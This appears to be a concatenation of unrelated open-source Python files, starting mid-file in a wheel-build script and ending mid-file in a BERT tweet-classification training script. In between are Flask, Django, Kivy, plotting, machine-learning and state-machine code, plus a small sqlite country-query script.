'../chemfiles/'], cwd=chfl_build_dir)
check_call(['cmake', '--build', '.', '--target', 'install', '--config', 'Release'], cwd=chfl_build_dir)
for py_env in py_envs:
python_executable, \
python_include_dir, \
python_library, \
pip, \
path = venv_paths(py_env)
with push_env(PATH='%s%s%s' % (path, os.pathsep, os.environ['PATH'])):
# Install dependencies
requirements_file = os.path.join(REPO_DIR, 'requirements-dev.txt')
if os.path.exists(requirements_file):
check_call([pip, 'install', '--upgrade', '-r', requirements_file])
check_call([pip, 'install', 'cmake'])
check_call([pip, 'install', 'scikit_build'])
build_type = 'Release'
# Generate wheel
check_call([
python_executable,
'setup.py', 'bdist_wheel',
'--build-type', build_type, '-G', 'Visual Studio 15 2017 Win64',
'--',
'-DPYTHON_EXECUTABLE:FILEPATH=%s' % python_executable,
'-DPYTHON_INCLUDE_DIR:PATH=%s' % python_include_dir,
'-DPYTHON_LIBRARY:FILEPATH=%s' % python_library,
'-DLEMON_EXTERNAL_CHEMFILES:BOOL=ON',
'-Dchemfiles_DIR:PATH=%s' % os.path.join(chfl_install_dir, 'lib', 'cmake', 'chemfiles'),
'-DLEMON_BUILD_PROGS:BOOL=OFF',
])
# Cleanup
check_call([python_executable, 'setup.py', 'clean'])
if __name__ == '__main__':
build_wheels()
|
502111 | from flask_restful import marshal_with
from flask_login import current_user
from flask_restful import fields, abort
from appname.api import Resource, BaseAPISchema, API_VERSION
class CurrentUserInfoSchema(BaseAPISchema):
get_fields = {
'id': fields.String,
'email': fields.String,
'full_name': fields.String,
}
class CurrentUserInfo(Resource):
schema = CurrentUserInfoSchema()
@marshal_with(schema.get_fields)
def get(self):
if not current_user.is_authenticated:
abort(401)
return current_user
|
502114 | import numpy as np
import scipy as sp
import pylab as pl
import glob
import json
import re
from matplotlib.widgets import Slider
def loaddata(alphas=[]):
files = glob.glob("dat-alpha-?.*.json")
alphas, xs, ys = [],[],[]
for f in files:
g = re.search(r"dat-alpha-([0-9]\.[0-9]{1,}).json", f)
alpha = float(g.groups()[0])
t = np.array(json.load(open(f)))[:,1] #np.loadtxt(f, delimiter=',')[:,1]
y,x = np.histogram(t, bins=np.logspace(0, 5, 30))#, normed=True)
y,x = np.histogram(t, bins=np.linspace(1, t.max(), 30))#, normed=True)
x = x[1:]#(x[1:] + x[:-1])/2
x = x[1:]
y = y[1:]
alphas.append(alpha)
xs.append(x)
ys.append(y/(y*x).sum())
return alphas, xs, ys
def rescale(alphas, xs, ys, alphac, sigma, tau):
out = []
for a,x,y in zip(alphas, xs, ys):
out.append([
x/abs(a-alphac)**(-1./sigma),
x**(-tau)*y*abs(a-alphac)**(-1./sigma)
])
return out
def plotall(alphas, xs, ys, alphac=2.25, sigma=1.86):
fig = pl.figure(1)
pl.clf()
out = rescale(alphas, xs, ys, alphac, sigma)
for a, o in zip(alphas, out):
pl.loglog(o[0], o[1], 'o-', label=str(a))
pl.legend()
#def slider_plot(alphas, xs, ys, alphac=0.439, sigma=0.397435897436, tau=1.01274038462):
#def slider_plot(alphas, xs, ys, alphac=0.433173076923, sigma=0.419951923077, tau=(187./91-1)):
#def slider_plot(alphas, xs, ys, alphac=0.442548076923, sigma=0.727163461538, tau=1.05528846154):
def slider_plot(alphas, xs, ys, alphac=0.441666666667, sigma=0.535657051282, tau=0):
fig = pl.figure(2)
pl.subplots_adjust(left=0.25, bottom=0.25)
pl.clf()
lines = []
out = rescale(alphas, xs, ys, alphac, sigma, tau)
for a, o in zip(alphas, out):
lines.append(pl.loglog(o[0], o[1], 'o-', label=str(a))[0])
#pl.axis([xs[0].min(), xs[0].max(), ys[0].min(), ys[0].max()])
#pl.legend(loc='lower left')
axcolor = 'white'
axalpha = pl.axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)
axsigma = pl.axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
axtau = pl.axes([0.25, 0.20, 0.65, 0.03], axisbg=axcolor)
print alphac, sigma, tau
salpha = Slider(axalpha, r"$\alpha$", 0.2, 0.6, valinit=alphac)
ssigma = Slider(axsigma, r"$\sigma$", 0.05, 1.0, valinit=sigma)
stau = Slider(axtau, r"$\tau$", -1.0, 2.0, valinit=tau)
def update(val):
alphac = salpha.val
sigma = ssigma.val
tau = stau.val
print "alphac =", alphac, "sigma = ", sigma, 'tau = ', tau
out = rescale(alphas, xs, ys, alphac, sigma, tau)
for line, o in zip(lines, out):
line.set_xdata(o[0])
line.set_ydata(o[1])
fig.canvas.draw_idle()
salpha.on_changed(update)
ssigma.on_changed(update)
stau.on_changed(update)
|
502125 | from torch import nn
class Wrapper:
@staticmethod
def get_args(parser):
parser.add('--l1_weight', type=float, default=30.0)
@staticmethod
def get_net(args):
criterion = Criterion(args.l1_weight)
return criterion.to(args.device)
class Criterion(nn.Module):
def __init__(self, weight):
super().__init__()
self.weight = weight
def forward(self, inputs):
fake_rgb = inputs['fake_rgbs']
real_rgb = inputs['target_rgbs']
loss_G_dict = {}
loss_G_dict['l1_rgb'] = self.weight * nn.functional.l1_loss(fake_rgb, real_rgb[:, 0])
return loss_G_dict
|
502151 | import os
import xgboost as xgb
import lightgbm as lgb
import shap
from ml.utils import get_algo_dir
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
def visualize_model(model, X, idx, configuration, namespace, name):
if configuration['enabled'] and idx % configuration['n_iterations'] == 0:
explainer = shap.TreeExplainer(model)
shap_values = explainer.shap_values(X)
shap.summary_plot(shap_values, X, plot_type="bar", show=False)
save_fig(namespace, name, idx, importance_type='shap')
if name == 'XGBOOST':
for i in ['weight', 'cover', 'gain']:
if i == 'gain':
xgb.plot_importance(model.get_score(fmap='', importance_type=i), importance_type=i, max_num_features=20)
else:
xgb.plot_importance(model, importance_type=i, max_num_features=20)
save_fig(namespace, name, idx, importance_type=i)
elif name == 'LIGHTGBM':
for i in ['split', 'gain']:
lgb.plot_importance(model, importance_type=i, max_num_features=20)
save_fig(namespace, name, idx, importance_type=i)
else:
pass
def save_fig(namespace, name, idx, importance_type):
folder = os.path.join(namespace, 'feature_exploration')
folder_path = get_algo_dir(folder)
f_path = os.path.join(folder_path, "analyze_features_model_{}_idx_{}_importance_type_{}.png".format(name, idx, importance_type))
if importance_type == 'gain' and name == 'XGBOOST':
plt.savefig(f_path, dpi='figure')
else:
plt.savefig(f_path, bbox_inches="tight", dpi=300)
|
502245 | import difflib
import pdb
import gensim
from time import time
from scipy.spatial.distance import pdist, squareform
import scipy
from numpy import dot
from numpy.linalg import norm
import numpy as np
import pickle
embedding_path = '/scratchd/home/satwik/embeddings/'
print('Loading Word2Vec')
st_time = time()
with open('/scratchd/home/satwik/embeddings/quora_word2vec.pickle', 'rb') as handle:
model = pickle.load(handle)
print('Word2vec Loaded')
etime = (time() - st_time)/60.0
print('Time Taken : {}'.format(etime))
# print('Loading Word2Vec')
# st_time = time()
# model = gensim.models.KeyedVectors.load_word2vec_format(embedding_path+'GoogleNews-vectors-negative300.bin.gz', binary=True)
# print('Word2vec Loaded')
# etime = (time() - st_time)/60.0
# print('Time Taken : {}'.format(etime))
cos_sim = lambda a,b: dot(a, b)/(norm(a)*norm(b))
rbf = lambda a,b, sigma : scipy.exp(-(np.sum( (a-b)**2 ) ** 2 )/ sigma ** 2)
def sent2wvec(s):
v= []
for w in s:
try:
vec = model[w]
v.append(vec)
except:
pass
v = np.array(v)
return v
def sentence_compare(s1, s2, kernel='cos', **kwargs):
l1 = s1.split()
l2 = s2.split()
# pdb.set_trace()
v1= sent2wvec(l1)
v2= sent2wvec(l2)
# v2 = np.array([model.wv.word_vec(w) for w in l2])
score = 0
len_s1 = v1.shape[0]
# pdb.set_trace()
for v in v1:
if kernel == 'cos':
wscore = np.max(np.array([cos_sim(v,i) for i in v2] ))
elif kernel == 'rbf':
wscore = np.max(np.array([rbf(v,i, kwargs['sigma']) for i in v2] ))
else:
print('Error in kernel type')
score += wscore/len_s1
return score
def sent_cosine_sim(X):
d=[]
for i in range(len(X) ):
td=[]
for j in range(len(X) ):
td.append(sentence_compare(X[i], X[j], 'cos'))
d.append(td)
# pdb.set_trace()
A= np.array(d)
print(A.shape)
V = (0.5*A)+ (0.5*A.T)
return V
def sent_rbf(X, sigma=0.5):
d=[]
for i in range(len(X) ):
td=[]
for j in range(len(X) ):
td.append(sentence_compare(X[i], X[j], kernel='rbf', sigma=sigma))
d.append(td)
# pdb.set_trace()
A= np.array(d)
print(A.shape)
V = (0.5*A)+ (0.5*A.T)
return V
if __name__ == '__main__':
sents =[]
sents.append('what is best way to make money online' )
sents.append('what should i do to make money online' )
sents.append('what should i do to earn money online' )
sents.append('what is the easiest way to make money online' )
sents.append('what is the easiest way to earn money online' )
sents.append('what s the easiest way to make money online' )
sents.append('what s the easiest way to earn money online' )
sents.append('what should i do to make money online online' )
sents.append('what is the best way to make money online' )
sents.append('what is the easiest way to make money online online' )
sent_cosine_sim(sents)
|
502255 | from django.conf import settings
from django.template import Library
register = Library()
@register.filter('theme_path')
def theme_path(user):
theme = getattr(user, 'theme', None) or settings.THEMES[0]
return 'bootswatch/dist/%s/bootstrap.min.css' % theme
@register.simple_tag
def has_perm(perm, user, obj=None):
return user.has_perm(perm, obj=obj)
|
502276 | from .errors import log_error, slack_error
from .ssh import ssh_connect
from .pyspark_udf import udf as pyspark_udf
from .fs_cache import s3_cache, json_file, pickle_file
from .timeout import time_limit
from .regres_test import regress
from .sklearn_dec import SKTransform, SKClassify
|
502354 | from userreport.models import UserReport, GraphicsDevice, GraphicsExtension, GraphicsLimit
from django.contrib import admin
class UserReportAdmin(admin.ModelAdmin):
readonly_fields = ['uploader', 'user_id_hash', 'upload_date', 'generation_date', 'data_type', 'data_version',
'data']
fieldsets = [
('User', {'fields': ['uploader', 'user_id_hash']}),
('Dates', {'fields': ['upload_date', 'generation_date']}),
(None, {'fields': ['data_type', 'data_version', 'data']}),
]
list_display = ('uploader', 'user_id_hash', 'data_type', 'data_version', 'upload_date', 'generation_date')
list_filter = ['upload_date', 'generation_date', 'data_type']
search_fields = ['=uploader', '=user_id_hash', 'data']
date_hierarchy = 'upload_date'
class GraphicsDeviceAdmin(admin.ModelAdmin):
pass
class GraphicsExtensionAdmin(admin.ModelAdmin):
pass
class GraphicsLimitAdmin(admin.ModelAdmin):
pass
admin.site.register(UserReport, UserReportAdmin)
admin.site.register(GraphicsDevice, GraphicsDeviceAdmin)
admin.site.register(GraphicsExtension, GraphicsExtensionAdmin)
admin.site.register(GraphicsLimit, GraphicsLimitAdmin)
|
502360 | from abc import ABC, abstractmethod
from typing import Optional
from eth.abc import AtomicDatabaseAPI
from eth2.beacon.db.abc import BaseBeaconChainDB
from eth2.beacon.fork_choice.abc import BaseForkChoice
from eth2.beacon.state_machines.abc import BaseBeaconStateMachine
from eth2.beacon.types.attestations import Attestation
from eth2.beacon.types.blocks import BaseSignedBeaconBlock, BeaconBlock
from eth2.beacon.types.states import BeaconState
from eth2.beacon.typing import Slot
from eth2.clock import Tick
class BaseBeaconChain(ABC):
@abstractmethod
def __init__(
self, chain_db: BaseBeaconChainDB, fork_choice: BaseForkChoice
) -> None:
...
@classmethod
@abstractmethod
def from_genesis(
cls, base_db: AtomicDatabaseAPI, genesis_state: BeaconState
) -> "BaseBeaconChain":
...
@property
@abstractmethod
def db(self) -> BaseBeaconChainDB:
...
@abstractmethod
def get_state_machine(self, slot: Slot) -> BaseBeaconStateMachine:
...
@abstractmethod
def get_canonical_head(self) -> BeaconBlock:
...
@abstractmethod
def get_canonical_head_state(self) -> BeaconState:
...
@abstractmethod
def get_block_by_slot(self, slot: Slot) -> Optional[BaseSignedBeaconBlock]:
...
@abstractmethod
def on_tick(self, tick: Tick) -> None:
...
@abstractmethod
def on_block(
self, block: BaseSignedBeaconBlock, perform_validation: bool = True
) -> None:
...
@abstractmethod
def on_attestation(self, attestation: Attestation) -> None:
...
def advance_state_to_slot(
chain: BaseBeaconChain, target_slot: Slot, state: BeaconState = None
) -> BeaconState:
if state is None:
state = chain.get_canonical_head_state()
current_slot = state.slot
for slot in range(current_slot, target_slot + 1):
slot = Slot(slot)
state_machine = chain.get_state_machine(slot)
state, _ = state_machine.apply_state_transition(state, future_slot=slot)
return state
|
502406 | import torch
# from typed_args import TypedArgs
import argparse
import os
from typing import Dict, List, NewType, Tuple
from tqdm import tqdm
from numpy.lib.format import open_memmap
import numpy as np
from utils.npy_file import NpyFile
from utils.io import dump_pickle
# class Args(TypedArgs):
# def __init__(self):
# parser = argparse.ArgumentParser()
# self.bboxes = parser.add_argument(
# '--bboxes'
# )
# self.output = parser.add_argument(
# '-o', '--output'
# )
# self.num_bboxes: int = parser.add_argument(
# '-n', '--num-bboxes', type=int, default=10
# )
# self.parse_args_from(parser)
parser = argparse.ArgumentParser()
parser.add_argument('--bboxes', help='path to bboxes')
parser.add_argument('-o', '--output', help='output path')
parser.add_argument('-n', '--num-bboxes', type=int, default=5,
help='use N bboxes, 5 is enough, 10 for ablation study')
def load_bboxes(args: Args) -> List[NpyFile]:
splits = os.listdir(args.bboxes)
splits = sorted(splits)
print(splits)
fps = []
for split in tqdm(splits):
fp = NpyFile(os.path.join(args.bboxes, split))
fps.append(fp)
return fps
def get_new_indices(fp: NpyFile, index: int) -> Dict[str, Tuple[int, int]]:
indices = fp.indices
for k in indices.keys():
indices[k][0] += index
return indices
def count_frames(fps: List[NpyFile]) -> int:
res = 0
for fp in fps:
res += len(fp.data)
return res
def main(args):
os.makedirs(args.output, exist_ok=True)
fps = load_bboxes(args)
total_frames = count_frames(fps)
print('total_frames:', total_frames)
new_indices = dict()
new_fp = open_memmap(
os.path.join(args.output, 'data.npy'),
mode='w+',
dtype=np.float32,
shape=(total_frames, 10, 2048)
)
index = 0
for fp in tqdm(fps):
length = len(fp.data)
new_fp[index: index + length] = fp.data
new_indices.update(get_new_indices(fp, index))
index += length
del new_fp
dump_pickle(new_indices, os.path.join(args.output, 'indices.pkl'))
if __name__ == "__main__":
# args = Args()
args = parser.parse_args()
main(args)
|
502429 | from xstate.machine import Machine
lights = Machine(
{
"id": "lights",
"initial": "green",
"states": {
"green": {"on": {"TIMER": "yellow"}, "entry": [{"type": "enterGreen"}]},
"yellow": {"on": {"TIMER": "red"}},
"red": {
"initial": "walk",
"states": {
"walk": {"on": {"COUNTDOWN": "wait"}},
"wait": {"on": {"COUNTDOWN": "stop"}},
"stop": {"on": {"TIMEOUT": "timeout"}},
"timeout": {"type": "final"},
},
"onDone": "green",
},
},
}
)
def test_machine():
yellow_state = lights.transition(lights.initial_state, "TIMER")
assert yellow_state.value == "yellow"
red_state = lights.transition(yellow_state, "TIMER")
assert red_state.value == {"red": "walk"}
def test_machine_initial_state():
assert lights.initial_state.value == "green"
def test_final_state():
red_stop_state = lights.state_from({"red": "stop"})
red_timeout_state = lights.transition(red_stop_state, "TIMEOUT")
assert red_timeout_state.value == "green"
fan = Machine(
{
"id": "fan",
"initial": "fanOff",
"states": {
"fanOff": {
"on": {
"POWER": "#fan.fanOn.hist",
"HIGH_POWER": "fanOn.highPowerHist",
},
},
"fanOn": {
"initial": "first",
"states": {
"first": {"on": {"SWITCH": "second"}},
"second": {"on": {"SWITCH": "third"}},
"third": {},
"hist": {"type": "history", "history": "shallow"},
"highPowerHist": {"type": "history", "target": "third"},
},
"on": {"POWER": "fanOff"},
},
},
}
)
def test_history_state():
on_state = fan.transition(fan.initial_state, "POWER")
assert on_state.value == "fanOn.first"
on_second_state = fan.transition(on_state, "SWITCH")
assert on_second_state.value == "fanOn.second"
off_state = fan.transition(on_second_state, "POWER")
assert off_state.value == "fanOff"
on_second_state = fan.transition(off_state, "POWER")
assert on_second_state.value == "fanOn.second"
def test_top_level_final():
final = Machine(
{
"id": "final",
"initial": "start",
"states": {
"start": {"on": {"FINISH": "end"}},
"end": {"type": "final"},
},
}
)
end_state = final.transition(final.initial_state, "FINISH")
assert end_state.value == "end"
|
502485 | from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
import webbrowser
class ExceptionScreen(Screen):
Builder.load_file('uix/kv/exceptionscreen/exceptionscreen.kv')
def __init__(self, exception_text, **kwargs):
self.exception_text = exception_text
super(ExceptionScreen, self).__init__(**kwargs)
def send_report_to_vk(self, text):
webbrowser.open('https://vk.com/topic-71248303_36001195')
def send_report_to_github(self, text):
webbrowser.open(
'https://github.com/Fogapod/VKBot/issues/new?body=' + text
)
|
502498 | import os
import yaml
import argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--archs', type = str, choices=['TSA'], help = 'our approach')
parser.add_argument('--benchmark', type = str, choices=['FineDiving'], help = 'dataset')
parser.add_argument('--prefix', type = str, default='default', help = 'experiment name')
parser.add_argument('--resume', action='store_true', default=False ,help = 'resume training (interrupted by accident)')
parser.add_argument('--sync_bn', type=bool, default=False)
parser.add_argument('--fix_bn', type=bool, default=True)
parser.add_argument('--test', action='store_true', default=False)
parser.add_argument('--ckpts', type=str, default=None, help='test used ckpt path')
args = parser.parse_args()
if args.test:
if args.ckpts is None:
raise RuntimeError('--ckpts should not be None when --test is activate')
return args
def setup(args):
args.config = '{}_TSA.yaml'.format(args.benchmark)
args.experiment_path = os.path.join('./experiments',args.archs, args.benchmark, args.prefix)
if args.resume:
cfg_path = os.path.join(args.experiment_path,'config.yaml')
if not os.path.exists(cfg_path):
print("Failed to resume")
args.resume = False
setup(args)
return
print('Resume yaml from %s' % cfg_path)
with open(cfg_path) as f:
config = yaml.load(f, Loader=yaml.Loader)
merge_config(config, args)
args.resume = True
else:
config = get_config(args)
merge_config(config, args)
create_experiment_dir(args)
save_experiment_config(args)
def get_config(args):
try:
print('Load config yaml from %s' % args.config)
with open(args.config) as f:
config = yaml.load(f, Loader=yaml.Loader)
except:
raise NotImplementedError('%s arch is not supported'% args.archs)
return config
def merge_config(config, args):
for k, v in config.items():
setattr(args, k, v)
def create_experiment_dir(args):
try:
os.makedirs(args.experiment_path)
print('Create experiment path successfully at %s' % args.experiment_path)
except:
pass
def save_experiment_config(args):
config_path = os.path.join(args.experiment_path,'config.yaml')
with open(config_path, 'w') as f:
yaml.dump(args.__dict__, f)
print('Save the Config file at %s' % config_path) |
502518 | import warnings
from typing import Dict
import torch
from torch import nn, optim as optim
from rl_multi_agent import MultiAgent
from utils.misc_util import ensure_shared_grads
def compute_losses_no_backprop(agent: MultiAgent):
full_loss = None
last_losses = {}
for k, loss in agent.loss().items():
loss = loss.squeeze()
last_losses["loss/" + k] = loss.item()
if full_loss is None:
full_loss = loss
elif (full_loss.is_cuda == loss.is_cuda) and (
not full_loss.is_cuda or full_loss.get_device() == loss.get_device()
):
full_loss += loss
else:
warnings.warn("Loss {} is on a different device!".format(k))
assert full_loss is not None
return last_losses
class TrainingCompleteException(Exception):
pass
class EndProcessException(Exception):
pass
def compute_losses_and_backprop(
agent: MultiAgent,
shared_model: nn.Module,
optimizer: optim.Optimizer,
update_lock,
gpu: bool,
retain_graph: bool = False,
skip_backprop: bool = False,
) -> Dict[str, float]:
agent.model.zero_grad()
full_loss = None
last_losses = {}
for k, loss in agent.loss().items():
loss = loss.squeeze()
last_losses["loss/" + k] = loss.item()
if full_loss is None:
full_loss = loss
elif (full_loss.is_cuda == loss.is_cuda) and (
not full_loss.is_cuda or full_loss.get_device() == loss.get_device()
):
full_loss += loss
else:
warnings.warn("Loss {} is on a different device!".format(k))
if full_loss is not None:
if not skip_backprop:
full_loss.backward(retain_graph=retain_graph)
torch.nn.utils.clip_grad_norm_(agent.model.parameters(), 3, "inf")
if update_lock is not None:
update_lock.acquire()
ensure_shared_grads(agent.model, shared_model, gpu=gpu)
optimizer.step()
if update_lock is not None:
update_lock.release()
else:
warnings.warn(
(
"No loss avaliable for agent.\n"
"Episode length: {}\n"
"Rewards: {}\n"
"Actions: {}\n"
"Expert actions: {}\n"
).format(
agent.episode.num_steps_taken_in_episode(),
agent.rewards_per_agent,
agent.actions,
agent.expert_actions,
)
)
return last_losses
|
502532 | import scipy as sp
import numpy as np
from scipy import stats as st
from scipy import linalg as la
import solutions as sol
data=sol.sim_data(sp.array([[108,200],[206,400],[74,140],[4,8]]),100000)
probs=sol.probabilities(data)
pulls=sol.numPulls(probs,1300)
if(sum(pulls)!=1300):
print("Total pulls does not equal to M")
else:
if (pulls[0]>320 and pulls[0]<380 and pulls[1]>130 and pulls[1]<190 and pulls[2]>270 and pulls[2]<330):
print("Passed")
else:
print("Number of pulls are not in range")
|
502545 | import peewee
import sqlite3
file = 'Paises.db'
db = peewee.SqliteDatabase(file)
class Pais(peewee.Model):
name = peewee.TextField()
capital = peewee.TextField()
region = peewee.TextField()
languages = peewee.TextField()
flag = peewee.TextField()
class Meta:
database = db
db_table = 'Paises'
def contar_paises():
db.connect()
total = Pais.select().count()
db.close()
return total
def datos_pais(pais = 'Mexico'):
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
datos = cursor.execute('SELECT * FROM Paises WHERE Nombre = "{}"'.format(pais)).fetchall()
conexion.close()
return datos[0]
def hispanos():
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
paises = cursor.execute('SELECT Nombre, Lenguajes FROM Paises').fetchall()
hispanohablantes = []
for pais in paises:
languages = pais[1].split(',')
if type(languages) != 'NoneType':
if 'spa' in languages:
hispanohablantes.append(pais[0])
return hispanohablantes
def europa():
conexion = sqlite3.connect(file)
cursor = conexion.cursor()
paises = cursor.execute('SELECT Nombre FROM Paises WHERE Region = "Europe"').fetchall()
conexion.close()
return paises
def main():
print('-Total de Paises: {}'.format(contar_paises()))
print('\n-Datos de México: {}'.format(datos_pais()))
paises = hispanos()
print('\n---Paises Hispanohablantes---')
for pais in paises:
print('\t*' + pais)
paises_europeos = europa()
print('\n---Paises de Europa---')
for pais in paises_europeos:
print('\t*' + pais[0])
if __name__ == '__main__':
main()
|
502553 | import os
def watch_templates(directory):
def wrapper(f):
f.TEMPLATES_DIRECTORY = directory
f.TEMPLATE_FILES = [f for f in os.listdir(directory) if f.endswith('tpl')]
return f
return wrapper
|
502568 | from enum import Enum
class ControlInputEnum(Enum):
@classmethod
def allowedValues(cls):
return []
class ControlOperation(ControlInputEnum):
START = 'start'
STOP = 'stop'
NONE = 'none'
SETTINGS = 'settings'
UNKNOWN = 'unknown'
@classmethod
def allowedValues(cls):
return [ControlOperation.START, ControlOperation.STOP]
|
502603 | import argparse
import pyperclip
from .pickuplinesgalore import PickuplinesGalore
from .pickuplinegen import Pickuplinegen
def say_sorry():
print("Sorry buddy! couldn't found any pickupline ¯\_(ツ)_/¯")
def run(args):
if args.list:
pick = PickuplinesGalore()
print("\n".join(pick.get_list_of_categories()))
return
line = None
if args.keyword:
pick = PickuplinesGalore()
line = pick.get_pickupline(args.keyword)
if not line:
say_sorry()
elif args.random:
pick = Pickuplinegen()
line = pick.get_pickupline()
if not line:
say_sorry()
if line:
print(line)
pyperclip.copy(line)
else:
print("try pickup-line --help for more info")
def init():
parser = argparse.ArgumentParser(description="A CLI tool for generating PickupLine from web",
epilog="the pickup-line will be copied to the clipboard",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-r', '--random', action='store_true', help="get a random pickupline")
parser.add_argument('-k', '--keyword', help="""Search pickuplines by keyword.
Example:
pickup-line --k trump
pickup-line -keyword geek
pickup-line --keyword scifi
pickup-line -k dirty
""")
parser.add_argument('-l', '--list', action="store_true", help="list all existing categories")
args = parser.parse_args()
return args
def main():
args = init()
try:
run(args)
except KeyboardInterrupt:
print("Error:Interrupted by user !!!") |
502606 | from virtool.users.fake import create_fake_bob_user
async def test_create_fake_bob_user(snapshot, app, dbi, static_time, mocker):
mocker.patch("virtool.db.utils.get_new_id", return_value="abc123")
await create_fake_bob_user(app)
assert await dbi.users.find_one({}, {"password": False}) == snapshot
|
502690 | from typing import Optional
from mstrio.utils.helper import Dictable
class Node(Dictable):
def __init__(self, name: str, address: Optional[str] = None,
service_control: Optional[bool] = None) -> None:
self.name = name
self.address = address
self.service_control = service_control
|
502850 | from plex.lib.six.moves.urllib_parse import urlparse as std_urlparse
def try_convert(value, value_type, default=None):
try:
return value_type(value)
except ValueError:
return default
except TypeError:
return default
def urlparse(url):
scheme = None
scheme_pos = url.find('://')
if scheme_pos != -1:
scheme = url[:scheme_pos]
url = url[scheme_pos + 1:]
return scheme, std_urlparse(url)
|
502926 | import math
import numpy as np
import string
import random
import json
import argparse
import torch as T
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from transformers import *
import sys
sys.path.append("../")
from DataLoader.bucket_and_batch import bucket_and_batch
from model.BERT_NL import Encoder as BERT_NL_Encoder
from model.BERT_BiLSTM import Encoder as BERT_BiLSTM_Encoder
from model.BERT_BiLSTM_attn import Encoder as BERT_BiLSTM_attn_Encoder
from model.BERT_attn_BiLSTM import Encoder as BERT_attn_BiLSTM_Encoder
from model.BERT_attn_BiLSTM_attn import Encoder as BERT_attn_BiLSTM_attn_Encoder
from model.BERT_capsule_BiLSTM_attn import Encoder as BERT_capsule_BiLSTM_attn_Encoder
from model.BERT_capsule_BiLSTM_capsule import Encoder as BERT_capsule_BiLSTM_capsule_Encoder
from model.BERT_capsule import Encoder as BERT_capsule_Encoder
import modules.utils as utils
import modules.eval as eval
parser = argparse.ArgumentParser(description='Model Name')
parser.add_argument('--model', type=str, default="BERT_capsule")
flags = parser.parse_args()
model_name = flags.model
print("\n\nTraining Model: {}\n\n".format(model_name))
model_dict = {'BERT_NL': BERT_NL_Encoder,
'BERT_BiLSTM': BERT_BiLSTM_Encoder,
'BERT_BiLSTM_attn': BERT_BiLSTM_attn_Encoder,
'BERT_attn_BiLSTM': BERT_attn_BiLSTM_Encoder,
'BERT_attn_BiLSTM_attn': BERT_attn_BiLSTM_attn_Encoder,
'BERT_capsule_BiLSTM_attn': BERT_capsule_BiLSTM_attn_Encoder,
'BERT_capsule_BiLSTM_capsule': BERT_capsule_BiLSTM_capsule_Encoder,
'BERT_capsule': BERT_capsule_Encoder}
Encoder = model_dict.get(model_name, BERT_BiLSTM_Encoder)
device = T.device('cuda' if T.cuda.is_available() else 'cpu')
# print(device)
if device == T.device('cuda'):
T.set_default_tensor_type(T.cuda.FloatTensor)
else:
T.set_default_tensor_type(T.FloatTensor)
random.seed(101)
bnb = bucket_and_batch()
if 'capsule' in model_name:
val_batch_size = 4
train_batch_size = 4
else:
val_batch_size = 8
train_batch_size = 8
accu_step = 64/train_batch_size
max_grad_norm = 2
with open('../Processed_Data/train_data.json') as file:
data = json.load(file)
train_texts = data["tweets"]
train_labels = data["labels"]
train_binary_labels = data["binary_labels"]
with open('../Processed_Data/val_data.json') as file:
data = json.load(file)
val_texts = data["tweets"]
val_labels = data["labels"]
val_binary_labels = data["binary_labels"]
with open('../Processed_Data/label_info.json') as file:
data = json.load(file)
labels2idx = data["labels2idx"]
binary_labels2idx = data["binary_labels2idx"]
label_weights = data["label_weights"]
binary_label_weights = data["binary_label_weights"]
idx2labels = {v: k for k, v in labels2idx.items()}
binary_idx2labels = {v: k for k, v in binary_labels2idx.items()}
label_weights_idx = [i for i in range(len(labels2idx))]
label_weights = [label_weights[idx2labels[id]] for id in label_weights_idx]
label_weights = T.tensor(label_weights).to(device)
binary_label_weights_idx = [0, 1]
binary_label_weights = [binary_label_weights[binary_idx2labels[id]]
for id in binary_label_weights_idx]
binary_label_weights = T.tensor(binary_label_weights).to(device)
model = Encoder(classes_num=len(labels2idx))
model = model.to(device)
parameter_count = sum(p.numel() for p in model.parameters() if p.requires_grad)
print("Parameter Count: ", parameter_count)
parameters = []
BERT_parameters = []
allowed_layers = [11, 10, 9, 8, 7, 6]
for name, param in model.named_parameters():
if "BERT" not in name:
parameters.append(param)
print(name)
print(param.size())
else:
for layer_num in allowed_layers:
layer_num = str(layer_num)
if ".{}.".format(layer_num) in name:
BERT_parameters.append(param)
print(name)
print(param.size())
break
optimizer = T.optim.AdamW([{'params': parameters},
{'params': BERT_parameters, 'lr': 2e-5}
], lr=1e-3, weight_decay=0)
def lambda1(epoch): return (1 / 10)**epoch
def lambda2(epoch): return (1 / 10)**epoch
scheduler = T.optim.lr_scheduler.LambdaLR(optimizer, [lambda1, lambda2])
def display(texts, predictions, labels, binary_predictions, binary_labels, label_masks):
global idx2labels
global binary_idx2labels
N = len(texts)
j = random.choice(np.arange(N).tolist())
display_text = texts[j]
display_prediction = idx2labels[predictions[j]]
display_gold = idx2labels[labels[j]]
if label_masks[j] == 0:
display_prediction = display_prediction+" (N\A)"
display_gold = "(unlabeled)"
display_binary_prediction = binary_idx2labels[binary_predictions[j]]
display_binary_gold = binary_idx2labels[binary_labels[j]]
print("\n\nExample Prediction\n")
print("Text: {}\n".format(display_text))
print("Prediction: {}, Gold: {}, Binary Prediction: {}, Binary Gold: {}\n".format(
display_prediction, display_gold, display_binary_prediction, display_binary_gold))
def predict(text_ids, labels, binary_labels, input_mask, label_mask, train=True):
global model
global label_weights
global binary_label_weights
with T.no_grad():
text_ids = T.tensor(text_ids).long().to(device)
labels = T.tensor(labels).long().to(device)
binary_labels = T.tensor(binary_labels).long().to(device)
input_mask = T.tensor(input_mask).float().to(device)
label_mask = T.tensor(label_mask).float().to(device)
if train:
model = model.train()
binary_logits, logits = model(text_ids, input_mask)
else:
model = model.eval()
binary_logits, logits = model(text_ids, input_mask)
# print(binary_logits.detach().cpu().numpy())
binary_predictions = np.where(binary_logits.view(-1).detach().cpu().numpy() > 0.5, 1, 0)
predictions = T.argmax(logits, dim=-1).detach().cpu().numpy()
loss = utils.cross_entropy(model, logits, labels, binary_logits, binary_labels,
label_weights, binary_label_weights, label_mask)
T.cuda.empty_cache()
return predictions, binary_predictions, loss
epochs = 100
val_batches_texts, val_batches_text_ids, \
val_batches_labels, val_batches_binary_labels, \
val_batches_mask, val_batches_label_masks = bnb.bucket_and_batch(
